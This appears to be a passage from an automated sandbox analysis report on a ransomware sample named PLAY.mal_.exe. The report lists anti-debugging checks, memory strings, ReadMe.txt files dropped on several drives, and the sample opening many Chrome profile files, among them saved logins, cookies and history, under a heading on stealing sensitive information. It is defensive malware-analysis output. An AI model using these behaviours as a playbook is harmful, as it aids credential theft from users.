        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEB441 push ecx; ret 0_2_00AEB451
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF1600 push ebx; ret 0_2_00AF1615
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEF7E0 push edi; ret 0_2_00AEF837
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEDF16 push edi; ret 0_2_00AEDF29
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: A:\ReadMe.txtJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: B:\ReadMe.txtJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ReadMe.txtJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exe TID: 5764Thread sleep time: -90000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: GetAdaptersInfo,0_2_00AF1A7D
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: GetAdaptersInfo,0_2_00AF1B89
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEB625 FindFirstFileW,0_2_00AEB625
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AFC6C9 FindFirstFileExW,0_2_00AFC6C9
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
        Source: PLAY.mal_.exe, 00000000.00000003.630100550.0000000001431000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
        Source: PLAY.mal_.exe, 00000000.00000003.464667289.0000000001430000.00000004.00000020.00020000.00000000.sdmp, PLAY.mal_.exe, 00000000.00000003.461841007.0000000001430000.00000004.00000020.00020000.00000000.sdmp, PLAY.mal_.exe, 00000000.00000003.467581499.0000000001436000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AFA283 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AFA283
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AFB0AC mov eax, dword ptr fs:[00000030h]0_2_00AFB0AC
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AFD3FB mov eax, dword ptr fs:[00000030h]0_2_00AFD3FB
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AFE483 GetProcessHeap,0_2_00AFE483
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF83F1 SetUnhandledExceptionFilter,0_2_00AF83F1
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AFA283 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AFA283
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF825E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AF825E
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF7B41 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AF7B41
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
        Source: PLAY.mal_.exe, 00000000.00000003.394554162.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
        Source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
        Source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
        Source: PLAY.mal_.exe, 00000000.00000003.393091382.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
        Source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
        Source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF84FB cpuid 0_2_00AF84FB
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF8147 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AF8147

        Stealing of Sensitive Information

        barindex
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.logJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\JumpListIconsRecentClosed\83a1e5e2-01ac-4719-ae04-f0093721c455.tmpJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\data_3Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\data_2Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Platform Notifications\LOG.oldJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\data_1Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\data_0Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\TransportSecurityJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\PreferencesJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sessions\Session_13305159346941976Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\Encryption\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000008Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\FaviconsJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\LOG.oldJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Network Persistent StateJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\LOG.oldJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\000003.logJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\indexJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sessions\Session_13305159336740646Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\000003.logJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
